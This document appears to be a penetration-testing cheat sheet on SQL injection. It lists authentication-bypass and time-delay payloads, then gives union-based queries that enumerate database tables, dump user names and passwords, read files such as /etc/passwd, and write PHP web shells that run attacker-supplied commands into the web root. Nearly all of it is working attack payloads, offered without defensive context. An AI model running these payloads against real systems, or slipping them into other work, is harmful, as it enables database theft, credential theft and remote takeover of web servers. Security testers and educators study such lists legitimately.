SQL Injection Payloads

SQL Injection Payloads

' -- 
1 or 1=1
1 waitfor delay '0:0:10'--
23 OR 1=1
admin' or '
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' and 1 in (select var from temp)--
anything' OR 'x'='x
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
' having 1=1--
hi or 1=1 --"
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
' or ''='
 or 0=0 #"
' or 0=0 --
' or 0=0 #
" or 0=0 --
or 0=0 --
or 0=0 #
' or 1 --'
' or 1/*
; or '1'='1'
' or '1'='1
' or '1'='1'--
' or 1=1
' or 1=1 /*
' or 1=1--
' or 1=1-- 
‘ or 1=1 --
" or 1=1--
or 1=1
or 1=1--
 or 1=1 or ""=
' or 1=1 or ''='
' or 1 in (select @@version)--
or%201=1 --

SQL Injection Commands

# sql vulnerability exist

# number of columns
?id=1 order by 9 -- -

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

# Get content from the users-table. From columns name and password. (0x3a creates a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

# read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

# create a file and check if really exist
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -
# create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

# then go to browser and see if you can execute commands

# Save file using UNION
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'

Last updated

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